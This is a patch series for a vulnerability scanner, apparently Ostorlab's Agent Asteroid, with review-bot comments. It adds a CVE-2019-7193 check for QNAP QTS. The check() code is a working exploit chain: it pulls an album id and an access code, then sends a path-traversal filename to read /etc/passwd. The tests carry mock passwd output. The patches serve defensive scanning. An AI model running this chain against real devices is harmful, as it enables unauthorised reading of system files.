From af6629e51ed02f180b11938cc48caff688559cd4 Mon Sep 17 00:00:00 2001 From: ostorlab Date: Wed, 22 Nov 2023 17:13:13 +0100 Subject: [PATCH 01/10] - CVE-2019-7193 - Change unit test titles --- agent/exploits/cve_2019_7193.py | 116 ++++++++++++++++++++++++++++++++ tests/exploits_test.py | 40 ++++++++++- 2 files changed, 154 insertions(+), 2 deletions(-) create mode 100644 agent/exploits/cve_2019_7193.py diff --git a/agent/exploits/cve_2019_7193.py b/agent/exploits/cve_2019_7193.py new file mode 100644 index 00000000..8df9fde1 --- /dev/null +++ b/agent/exploits/cve_2019_7193.py 
@@ -0,0 +1,116 @@ +"""Agent Asteroid implementation for CVE-2021-22941""" +import re + +import requests +from ostorlab.agent.kb import kb +from ostorlab.agent.mixins import agent_report_vulnerability_mixin +from requests import exceptions as requests_exceptions + +from agent import definitions +from agent import exploits_registry + +VULNERABILITY_TITLE = "This improper input validation vulnerability in QNAP QTS" +VULNERABILITY_REFERENCE = "CVE-2019-7193" +VULNERABILITY_DESCRIPTION = ( + "This improper input validation vulnerability allows remote attackers to inject arbitrary code to the system. " + "To fix the vulnerability, QNAP recommend updating QTS to their latest versions." +) + +DEFAULT_TIMEOUT = 90 +HEADERS = {"User-Agent": "Gundy - QNAP RCE"} +TARGET_FILE = "./../../../../../etc/passwd" + + +@exploits_registry.register +class CVE20197193Exploit(definitions.Exploit): + """ + CVE-2021-22941: Improper Access Control in Citrix ShareFile storage zones controller + """ + + def accept(self, target: definitions.Target) -> bool: + target_uri = f"{target.scheme}://{target.host}:{target.port}" + try: + req = requests.get( + target_uri + "/cgi-bin/", verify=False, timeout=DEFAULT_TIMEOUT + ) + except requests_exceptions.RequestException: + return False + return req.status_code == 200 + + def check(self, target: definitions.Target) -> list[definitions.Vulnerability]: + target_uri = f"{target.scheme}://{target.host}:{target.port}" + session = requests.Session() + + req = session.post( + target_uri + "/photo/p/api/album.php", + data={"a": "setSlideshow", "f": "qsamplealbum"}, + headers=HEADERS, + verify=False, + timeout=DEFAULT_TIMEOUT, + ) + if req.status_code != 200: + return [] + album_id = re.search("(?<=).*?(?=)", req.text).group() + + req = session.get( + target_uri + "/photo/slideshow.php?album=" + album_id, + headers=HEADERS, + verify=False, + timeout=DEFAULT_TIMEOUT, + ) + if req.status_code != 200: + return [] + access_code = 
re.search("(?<=encodeURIComponent\\(').*?(?=')", req.text).group() + + post_data = { + "album": album_id, + "a": "caption", + "ac": access_code, + "f": "UMGObv", + "filename": TARGET_FILE, + } + req = session.post( + target_uri + "/photo/p/api/video.php", + data=post_data, + headers=HEADERS, + verify=False, + timeout=DEFAULT_TIMEOUT, + ) + if b"/bin/sh" not in req.content: + return [] + + vulnerability = self._generate_vulnerability_object(target_uri) + return [vulnerability] + + def _generate_vulnerability_object( + self, target_uri: str + ) -> definitions.Vulnerability: + entry = kb.Entry( + title=VULNERABILITY_TITLE, + risk_rating="HIGH", + short_description=VULNERABILITY_DESCRIPTION, + description=VULNERABILITY_DESCRIPTION, + references={ + "nvd.nist.gov": f"https://nvd.nist.gov/vuln/detail/{VULNERABILITY_REFERENCE}" + }, + recommendation=( + "- Make sure to install the latest security patches from software vendor \n" + "- Update to the latest software version" + ), + security_issue=True, + privacy_issue=False, + has_public_exploit=False, + targeted_by_malware=False, + targeted_by_ransomware=False, + targeted_by_nation_state=False, + ) + technical_detail = ( + f"{target_uri} is vulnerable to {VULNERABILITY_REFERENCE}, " + f"{VULNERABILITY_TITLE}" + ) + vulnerability = definitions.Vulnerability( + entry=entry, + technical_detail=technical_detail, + risk_rating=agent_report_vulnerability_mixin.RiskRating.HIGH, + ) + return vulnerability diff --git a/tests/exploits_test.py b/tests/exploits_test.py index 87cdffaa..602a970a 100644 --- a/tests/exploits_test.py +++ b/tests/exploits_test.py 
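Review bot: `check()` issues three `session` requests with no exception handling, while `accept()` in the same class catches `requests_exceptions.RequestException` and returns False. A timeout or a reset connection partway through the probe therefore propagates out of `check()` instead of producing an empty result; how the calling framework treats that exception is not visible here. Wrapping the three calls in `try:` … `except requests_exceptions.RequestException: return []` would make the two methods consistent. Because `DEFAULT_TIMEOUT = 90` applies to each request separately, one unresponsive host can hold the check for several minutes, so a shorter per-request timeout is worth considering.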
@@ -9,11 +9,12 @@ from agent import definitions from agent.exploits import cve_2021_22941 from agent.exploits import cve_2023_27997 +from agent.exploits import cve_2019_7193 seed: int = 0 -def testCVE_2023_27997_whenVulnerable_reportFinding( +def testCVE202327997_whenVulnerable_reportFinding( mocker: plugin.MockerFixture, ) -> None: exploit_instance = cve_2023_27997.CVE202327997Exploit() @@ -48,7 +49,7 @@ def side_effect(*args, **kwargs): # type: ignore[no-untyped-def] assert vulnerability.entry.risk_rating == "HIGH" -def testCVE_2021_22941_whenVulnerable_reportFinding( +def testCVE202122941_whenVulnerable_reportFinding( requests_mock: req_mock.mocker.Mocker, ) -> None: """Unit test for CVE-2021-22941, case when target is vulnerable""" 
@@ -80,3 +81,38 @@ def testCVE_2021_22941_whenVulnerable_reportFinding( == "https://75.162.65.52 is vulnerable to CVE-2021-22941, Improper Access Control " "in Citrix ShareFile storage zones controller" ) + + +def testCVE20197193_whenVulnerable_reportFinding( + requests_mock: req_mock.mocker.Mocker, +) -> None: + """Unit test for CVE-2019-7193, case when target is vulnerable""" + target = definitions.Target(scheme="https", host="127.0.0.1", port=443) + exploit_instance = cve_2019_7193.CVE20197193Exploit() + requests_mock.post( + "https://127.0.0.1:443/photo/p/api/album.php", + content=b"xyz", + ) + requests_mock.get( + "https://127.0.0.1:443/photo/slideshow.php?album=xyz", + content=b"encodeURIComponent('abc')", + ) + requests_mock.post( + "https://127.0.0.1:443/photo/p/api/video.php", + content=b"admin:x:0:0:administrator,,,:/share/homes/admin:/bin/sh" + b"guest:x:65534:65534:guest:/share/homes/guest:/bin/sh" + b"httpdusr:x:99:0:Apache httpd user:/tmp:/bin/sh" + b"[sshd]:x:110:65534:SSHD Privilege Separation:/var/empty:/bin/sh", + ) + + vulnerabilities = exploit_instance.check(target) + vulnerability = vulnerabilities[0] + + assert ( + vulnerability.entry.title + == "This improper input validation vulnerability in QNAP QTS" + ) + assert ( + vulnerability.technical_detail + == "https://127.0.0.1:443 is vulnerable to CVE-2019-7193, This improper input validation vulnerability in QNAP QTS" + ) From 158f02b49e5d18952c9ac797489e576281057d4d Mon Sep 17 00:00:00 2001 From: ostorlab Date: Wed, 22 Nov 2023 17:40:35 +0100 Subject: [PATCH 02/10] Fix unittest --- tests/exploits_registry_test.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tests/exploits_registry_test.py b/tests/exploits_registry_test.py index 84a23bd9..92df9331 100644 --- a/tests/exploits_registry_test.py +++ b/tests/exploits_registry_test.py 
@@ -12,7 +12,7 @@ def testExploitsRegistry_importingAllExploits_registerAll() -> None: registered_exploits = exploits_registry.ExploitsRegistry.values() - assert len(registered_exploits) == 2 + assert len(registered_exploits) == 3 def testExploitsRegistry_allExploits_mustBeRegisteredOnce() -> None: From 38058d4c73d43b9a04cede995e34a4ba3f9f09b5 Mon Sep 17 00:00:00 2001 From: ostorlab Date: Wed, 22 Nov 2023 17:56:34 +0100 Subject: [PATCH 03/10] Fix linting --- agent/exploits/cve_2019_7193.py | 13 +++++++++++-- tests/exploits_test.py | 3 ++- 2 files changed, 13 insertions(+), 3 deletions(-) diff --git a/agent/exploits/cve_2019_7193.py b/agent/exploits/cve_2019_7193.py index 8df9fde1..34bb6920 100644 --- a/agent/exploits/cve_2019_7193.py +++ b/agent/exploits/cve_2019_7193.py @@ -41,6 +41,7 @@ def check(self, target: definitions.Target) -> list[definitions.Vulnerability]: target_uri = f"{target.scheme}://{target.host}:{target.port}" session = requests.Session() + # Get album id req = session.post( target_uri + "/photo/p/api/album.php", data={"a": "setSlideshow", "f": "qsamplealbum"}, @@ -50,8 +51,12 @@ def check(self, target: definitions.Target) -> list[definitions.Vulnerability]: ) if req.status_code != 200: return [] - album_id = re.search("(?<=).*?(?=)", req.text).group() + album_match = re.search("(?<=).*?(?=)", req.text) + if album_match is None: + return [] + album_id = album_match.group() + # Get access code req = session.get( target_uri + "/photo/slideshow.php?album=" + album_id, headers=HEADERS, @@ -60,8 +65,12 @@ def check(self, target: definitions.Target) -> list[definitions.Vulnerability]: ) if req.status_code != 200: return [] - access_code = re.search("(?<=encodeURIComponent\\(').*?(?=')", req.text).group() + access_match = re.search("(?<=encodeURIComponent\\(').*?(?=')", req.text) + if access_match is None: + return [] + access_code = access_match.group() + # Read local file post_data = { "album": album_id, "a": "caption", 
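Review bot: After the new `None` check in the `@@ -50,8 +51,12 @@` hunk, `album_id` is still whatever text the scanned host returned, and the context line `target_uri + "/photo/slideshow.php?album=" + album_id` splices it into the URL unencoded. A value containing `&`, `#` or whitespace changes the request that is actually sent. Passing it as `params={"album": album_id}` to `session.get(target_uri + "/photo/slideshow.php", ...)` lets requests encode it, the same way the later POST already passes `album_id` and `access_code` through `data=`. `check()` begins and ends outside these hunks.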
diff --git a/tests/exploits_test.py b/tests/exploits_test.py index 602a970a..6b94c484 100644 --- a/tests/exploits_test.py +++ b/tests/exploits_test.py @@ -114,5 +114,6 @@ def testCVE20197193_whenVulnerable_reportFinding( ) assert ( vulnerability.technical_detail - == "https://127.0.0.1:443 is vulnerable to CVE-2019-7193, This improper input validation vulnerability in QNAP QTS" + == "https://127.0.0.1:443 is vulnerable to CVE-2019-7193, " + "This improper input validation vulnerability in QNAP QTS" ) From d7c13173d4a5784bb678f6ff4e0ac70b6fd4c9f9 Mon Sep 17 00:00:00 2001 From: Mohamed Benchikh <129080649+BlueSquare1@users.noreply.github.com> Date: Thu, 23 Nov 2023 09:00:43 +0100 Subject: [PATCH 04/10] Update CVE --- agent/exploits/cve_2019_7193.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/agent/exploits/cve_2019_7193.py b/agent/exploits/cve_2019_7193.py index 34bb6920..786eea1b 100644 --- a/agent/exploits/cve_2019_7193.py +++ b/agent/exploits/cve_2019_7193.py @@ -1,4 +1,4 @@ -"""Agent Asteroid implementation for CVE-2021-22941""" +"""Agent Asteroid implementation for CVE-2019-7193""" import re import requests From b9bac475e6cbd75d3db4b62c9c44be080d75547a Mon Sep 17 00:00:00 2001 From: ostorlab Date: Thu, 23 Nov 2023 10:09:06 +0100 Subject: [PATCH 05/10] Address comments --- agent/exploits/cve_2019_7193.py | 43 +++++++++++++++++---------------- tests/cve_2019_7193_test.py | 41 +++++++++++++++++++++++++++++++ tests/exploits_test.py | 37 ---------------------------- 3 files changed, 63 insertions(+), 58 deletions(-) create mode 100644 tests/cve_2019_7193_test.py diff --git a/agent/exploits/cve_2019_7193.py b/agent/exploits/cve_2019_7193.py index 786eea1b..6b5d6f83 100644 --- a/agent/exploits/cve_2019_7193.py +++ b/agent/exploits/cve_2019_7193.py 
@@ -30,42 +30,42 @@ class CVE20197193Exploit(definitions.Exploit): def accept(self, target: definitions.Target) -> bool: target_uri = f"{target.scheme}://{target.host}:{target.port}" try: - req = requests.get( + resp = requests.get( target_uri + "/cgi-bin/", verify=False, timeout=DEFAULT_TIMEOUT ) except requests_exceptions.RequestException: return False - return req.status_code == 200 + return resp.status_code == 200 def check(self, target: definitions.Target) -> list[definitions.Vulnerability]: target_uri = f"{target.scheme}://{target.host}:{target.port}" session = requests.Session() # Get album id - req = session.post( + resp = session.post( target_uri + "/photo/p/api/album.php", data={"a": "setSlideshow", "f": "qsamplealbum"}, headers=HEADERS, verify=False, timeout=DEFAULT_TIMEOUT, ) - if req.status_code != 200: + if resp.status_code != 200: return [] - album_match = re.search("(?<=).*?(?=)", req.text) + album_match = re.search("(?<=).*?(?=)", resp.text) if album_match is None: return [] album_id = album_match.group() # Get access code - req = session.get( + resp = session.get( target_uri + "/photo/slideshow.php?album=" + album_id, headers=HEADERS, verify=False, timeout=DEFAULT_TIMEOUT, ) - if req.status_code != 200: + if resp.status_code != 200: return [] - access_match = re.search("(?<=encodeURIComponent\\(').*?(?=')", req.text) + access_match = re.search("(?<=encodeURIComponent\\(').*?(?=')", resp.text) if access_match is None: return [] access_code = access_match.group() 
@@ -78,29 +78,30 @@ def check(self, target: definitions.Target) -> list[definitions.Vulnerability]: "f": "UMGObv", "filename": TARGET_FILE, } - req = session.post( + resp = session.post( target_uri + "/photo/p/api/video.php", data=post_data, headers=HEADERS, verify=False, timeout=DEFAULT_TIMEOUT, ) - if b"/bin/sh" not in req.content: + if b"/bin/sh" not in resp.content: return [] - vulnerability = self._generate_vulnerability_object(target_uri) + vulnerability = self._create_vulnerability(target_uri) return [vulnerability] - def _generate_vulnerability_object( - self, target_uri: str - ) -> definitions.Vulnerability: + def _create_vulnerability(self, target_uri: str) -> definitions.Vulnerability: entry = kb.Entry( title=VULNERABILITY_TITLE, - risk_rating="HIGH", + risk_rating="CRITICAL", short_description=VULNERABILITY_DESCRIPTION, description=VULNERABILITY_DESCRIPTION, references={ - "nvd.nist.gov": f"https://nvd.nist.gov/vuln/detail/{VULNERABILITY_REFERENCE}" + "nvd.nist.gov": f"https://nvd.nist.gov/vuln/detail/{VULNERABILITY_REFERENCE}", + "qnap.com": "https://www.qnap.com/en-us/security-advisory/nas-201911-25", + "packetstormsecurity.com": "https://packetstormsecurity.com/files/157857/" + "QNAP-QTS-And-Photo-Station-6.0.3-Remote-Command-Execution.html", }, recommendation=( "- Make sure to install the latest security patches from software vendor \n" @@ -108,10 +109,10 @@ def _generate_vulnerability_object( ), security_issue=True, privacy_issue=False, - has_public_exploit=False, - targeted_by_malware=False, - targeted_by_ransomware=False, - targeted_by_nation_state=False, + has_public_exploit=True, + targeted_by_malware=True, + targeted_by_ransomware=True, + targeted_by_nation_state=True, ) technical_detail = ( f"{target_uri} is vulnerable to {VULNERABILITY_REFERENCE}, " 
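Review bot: The finding is decided by `b"/bin/sh" not in resp.content`, a substring that any response mentioning a shell path satisfies, and this hunk raises the reported rating to CRITICAL, so a false match now surfaces as a critical finding. Matching the shape of a passwd entry is stricter, for example `if re.search(rb"^[^:\n]+:[^:\n]*:\d+:\d+:", resp.content, re.MULTILINE) is None: return []`; `re` is already imported and the test fixture beginning `admin:x:0:0:` still matches. The status code of this last response is also not checked, unlike the two requests before it. Separately, `targeted_by_malware`, `targeted_by_ransomware` and `targeted_by_nation_state` flip to True while the added references are the NVD entry, the vendor advisory and a public exploit listing; a comment naming the source for those three flags would let a reader verify them. `check()` begins outside the hunk.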
@@ -120,6 +121,6 @@ def _generate_vulnerability_object( vulnerability = definitions.Vulnerability( entry=entry, technical_detail=technical_detail, - risk_rating=agent_report_vulnerability_mixin.RiskRating.HIGH, + risk_rating=agent_report_vulnerability_mixin.RiskRating.CRITICAL, ) return vulnerability diff --git a/tests/cve_2019_7193_test.py b/tests/cve_2019_7193_test.py new file mode 100644 index 00000000..353eb2e7 --- /dev/null +++ b/tests/cve_2019_7193_test.py @@ -0,0 +1,41 @@ +"""Unit tests for CVE-2019-7193""" +import requests_mock as req_mock +from agent.exploits import cve_2019_7193 +from agent import definitions + + +def testCVE20197193_whenVulnerable_reportFinding( + requests_mock: req_mock.mocker.Mocker, +) -> None: + """Unit test for CVE-2019-7193, case when target is vulnerable""" + target = definitions.Target(scheme="https", host="127.0.0.1", port=443) + exploit_instance = cve_2019_7193.CVE20197193Exploit() + requests_mock.post( + "https://127.0.0.1:443/photo/p/api/album.php", + content=b"xyz", + ) + requests_mock.get( + "https://127.0.0.1:443/photo/slideshow.php?album=xyz", + content=b"encodeURIComponent('abc')", + ) + requests_mock.post( + "https://127.0.0.1:443/photo/p/api/video.php", + content=b"admin:x:0:0:administrator,,,:/share/homes/admin:/bin/sh" + b"guest:x:65534:65534:guest:/share/homes/guest:/bin/sh" + b"httpdusr:x:99:0:Apache httpd user:/tmp:/bin/sh" + b"[sshd]:x:110:65534:SSHD Privilege Separation:/var/empty:/bin/sh", + ) + + vulnerabilities = exploit_instance.check(target) + vulnerability = vulnerabilities[0] + + assert ( + vulnerability.entry.title + == "This improper input validation vulnerability in QNAP QTS" + ) + assert ( + vulnerability.technical_detail + == "https://127.0.0.1:443 is vulnerable to CVE-2019-7193, " + "This improper input validation vulnerability in QNAP QTS" + ) + assert vulnerability.risk_rating.name == "CRITICAL" diff --git a/tests/exploits_test.py b/tests/exploits_test.py index 6b94c484..02ea113f 100644 
--- a/tests/exploits_test.py +++ b/tests/exploits_test.py @@ -9,7 +9,6 @@ from agent import definitions from agent.exploits import cve_2021_22941 from agent.exploits import cve_2023_27997 -from agent.exploits import cve_2019_7193 seed: int = 0 @@ -81,39 +80,3 @@ def testCVE202122941_whenVulnerable_reportFinding( == "https://75.162.65.52 is vulnerable to CVE-2021-22941, Improper Access Control " "in Citrix ShareFile storage zones controller" ) - - -def testCVE20197193_whenVulnerable_reportFinding( - requests_mock: req_mock.mocker.Mocker, -) -> None: - """Unit test for CVE-2019-7193, case when target is vulnerable""" - target = definitions.Target(scheme="https", host="127.0.0.1", port=443) - exploit_instance = cve_2019_7193.CVE20197193Exploit() - requests_mock.post( - "https://127.0.0.1:443/photo/p/api/album.php", - content=b"xyz", - ) - requests_mock.get( - "https://127.0.0.1:443/photo/slideshow.php?album=xyz", - content=b"encodeURIComponent('abc')", - ) - requests_mock.post( - "https://127.0.0.1:443/photo/p/api/video.php", - content=b"admin:x:0:0:administrator,,,:/share/homes/admin:/bin/sh" - b"guest:x:65534:65534:guest:/share/homes/guest:/bin/sh" - b"httpdusr:x:99:0:Apache httpd user:/tmp:/bin/sh" - b"[sshd]:x:110:65534:SSHD Privilege Separation:/var/empty:/bin/sh", - ) - - vulnerabilities = exploit_instance.check(target) - vulnerability = vulnerabilities[0] - - assert ( - vulnerability.entry.title - == "This improper input validation vulnerability in QNAP QTS" - ) - assert ( - vulnerability.technical_detail - == "https://127.0.0.1:443 is vulnerable to CVE-2019-7193, " - "This improper input validation vulnerability in QNAP QTS" - ) From 4a81b7ac1e00230b7611dfc3ea206b547683c26f Mon Sep 17 00:00:00 2001 From: ostorlab Date: Thu, 23 Nov 2023 11:37:59 +0100 Subject: [PATCH 06/10] Address comments --- agent/exploits/cve_2019_7193.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) 
diff --git a/agent/exploits/cve_2019_7193.py b/agent/exploits/cve_2019_7193.py index 6b5d6f83..d2aa1282 100644 --- a/agent/exploits/cve_2019_7193.py +++ b/agent/exploits/cve_2019_7193.py @@ -9,7 +9,7 @@ from agent import definitions from agent import exploits_registry -VULNERABILITY_TITLE = "This improper input validation vulnerability in QNAP QTS" +VULNERABILITY_TITLE = "QNAP QTS Improper Input Validation Vulnerability " VULNERABILITY_REFERENCE = "CVE-2019-7193" VULNERABILITY_DESCRIPTION = ( "This improper input validation vulnerability allows remote attackers to inject arbitrary code to the system. " @@ -24,7 +24,7 @@ @exploits_registry.register class CVE20197193Exploit(definitions.Exploit): """ - CVE-2021-22941: Improper Access Control in Citrix ShareFile storage zones controller + CVE-2019-7193: QNAP QTS Improper Input Validation Vulnerability """ def accept(self, target: definitions.Target) -> bool: From cc8f951fa8f469d15db0d52cc4f60727a81354bb Mon Sep 17 00:00:00 2001 From: ostorlab Date: Thu, 23 Nov 2023 11:48:40 +0100 Subject: [PATCH 07/10] Address comments --- agent/exploits/cve_2019_7193.py | 2 +- tests/cve_2019_7193_test.py | 21 ++++++++++++++++++--- 2 files changed, 19 insertions(+), 4 deletions(-) diff --git a/agent/exploits/cve_2019_7193.py b/agent/exploits/cve_2019_7193.py index d2aa1282..05d15b83 100644 --- a/agent/exploits/cve_2019_7193.py +++ b/agent/exploits/cve_2019_7193.py @@ -9,7 +9,7 @@ from agent import definitions from agent import exploits_registry -VULNERABILITY_TITLE = "QNAP QTS Improper Input Validation Vulnerability " +VULNERABILITY_TITLE = "QNAP QTS Improper Input Validation Vulnerability" VULNERABILITY_REFERENCE = "CVE-2019-7193" VULNERABILITY_DESCRIPTION = ( "This improper input validation vulnerability allows remote attackers to inject arbitrary code to the system. " diff --git a/tests/cve_2019_7193_test.py b/tests/cve_2019_7193_test.py index 353eb2e7..5ccdff1b 100644 --- a/tests/cve_2019_7193_test.py 
+++ b/tests/cve_2019_7193_test.py @@ -30,12 +30,27 @@ def testCVE20197193_whenVulnerable_reportFinding( vulnerability = vulnerabilities[0] assert ( - vulnerability.entry.title - == "This improper input validation vulnerability in QNAP QTS" + vulnerability.entry.title == "QNAP QTS Improper Input Validation Vulnerability" ) assert ( vulnerability.technical_detail == "https://127.0.0.1:443 is vulnerable to CVE-2019-7193, " - "This improper input validation vulnerability in QNAP QTS" + "QNAP QTS Improper Input Validation Vulnerability" ) assert vulnerability.risk_rating.name == "CRITICAL" + + +def testCVE20197193_whenSafe_reportFinding( + requests_mock: req_mock.mocker.Mocker, +) -> None: + """Unit test for CVE-2019-7193, case when target is vulnerable""" + target = definitions.Target(scheme="https", host="127.0.0.1", port=443) + exploit_instance = cve_2019_7193.CVE20197193Exploit() + requests_mock.post( + "https://127.0.0.1:443/photo/p/api/album.php", + content=b"Invalid Request", + ) + + vulnerabilities = exploit_instance.check(target) + + assert len(vulnerabilities) == 0 From c9177a9c5fc31a1875506ef0819375073ae57dda Mon Sep 17 00:00:00 2001 From: Mohamed Benchikh <129080649+BlueSquare1@users.noreply.github.com> Date: Thu, 23 Nov 2023 14:35:49 +0100 Subject: [PATCH 08/10] Update cve_2019_7193_test.py --- tests/cve_2019_7193_test.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tests/cve_2019_7193_test.py b/tests/cve_2019_7193_test.py index 5ccdff1b..034ce589 100644 --- a/tests/cve_2019_7193_test.py +++ b/tests/cve_2019_7193_test.py @@ -40,7 +40,7 @@ def testCVE20197193_whenVulnerable_reportFinding( assert vulnerability.risk_rating.name == "CRITICAL" -def testCVE20197193_whenSafe_reportFinding( +def testCVE20197193_whenSafe_reportNothing( requests_mock: req_mock.mocker.Mocker, ) -> None: """Unit test for CVE-2019-7193, case when target is vulnerable""" From 9b3843892603503e0b1ff377fa512b4280865ee1 Mon Sep 17 00:00:00 2001 
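Review bot: The negative test added in the `@@ -30,12 +30,27 @@` hunk mocks only `album.php` with `b"Invalid Request"`, so it exercises just the first early exit of `check()`. The later exits are what keep a patched host from being reported, and none of them is pinned: a non-200 `slideshow.php` response, a `slideshow.php` response with no access code, and a `video.php` body without passwd content. A case that mocks all three endpoints with a benign `video.php` body and asserts `exploit_instance.check(target) == []` would cover the final decision. `accept()` has no test in the patches shown.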
From: Mohamed Benchikh <129080649+BlueSquare1@users.noreply.github.com> Date: Thu, 23 Nov 2023 14:37:16 +0100 Subject: [PATCH 09/10] Update cve_2019_7193_test.py --- tests/cve_2019_7193_test.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/tests/cve_2019_7193_test.py b/tests/cve_2019_7193_test.py index 034ce589..7a1e45a6 100644 --- a/tests/cve_2019_7193_test.py +++ b/tests/cve_2019_7193_test.py @@ -7,7 +7,7 @@ def testCVE20197193_whenVulnerable_reportFinding( requests_mock: req_mock.mocker.Mocker, ) -> None: - """Unit test for CVE-2019-7193, case when target is vulnerable""" + """Unit test for CVE-2019-7193, case when target is vulnerable.""" target = definitions.Target(scheme="https", host="127.0.0.1", port=443) exploit_instance = cve_2019_7193.CVE20197193Exploit() requests_mock.post( @@ -43,7 +43,7 @@ def testCVE20197193_whenVulnerable_reportFinding( def testCVE20197193_whenSafe_reportNothing( requests_mock: req_mock.mocker.Mocker, ) -> None: - """Unit test for CVE-2019-7193, case when target is vulnerable""" + """Unit test for CVE-2019-7193, case when target is safe.""" target = definitions.Target(scheme="https", host="127.0.0.1", port=443) exploit_instance = cve_2019_7193.CVE20197193Exploit() requests_mock.post( From ee5c59952e42b7e05426baa6c8ea8561b8d1c70b Mon Sep 17 00:00:00 2001 From: ostorlab Date: Fri, 24 Nov 2023 10:22:14 +0100 Subject: [PATCH 10/10] Address conflict --- tests/{ => exploits}/cve_2019_7193_test.py | 0 tests/exploits_registry_test.py | 2 +- 2 files changed, 1 insertion(+), 1 deletion(-) rename tests/{ => exploits}/cve_2019_7193_test.py (100%) diff --git a/tests/cve_2019_7193_test.py b/tests/exploits/cve_2019_7193_test.py similarity index 100% rename from tests/cve_2019_7193_test.py rename to tests/exploits/cve_2019_7193_test.py diff --git a/tests/exploits_registry_test.py b/tests/exploits_registry_test.py index 92df9331..21427881 100644 --- a/tests/exploits_registry_test.py +++ b/tests/exploits_registry_test.py 
@@ -12,7 +12,7 @@ def testExploitsRegistry_importingAllExploits_registerAll() -> None: registered_exploits = exploits_registry.ExploitsRegistry.values() - assert len(registered_exploits) == 3 + assert len(registered_exploits) == 4 def testExploitsRegistry_allExploits_mustBeRegisteredOnce() -> None: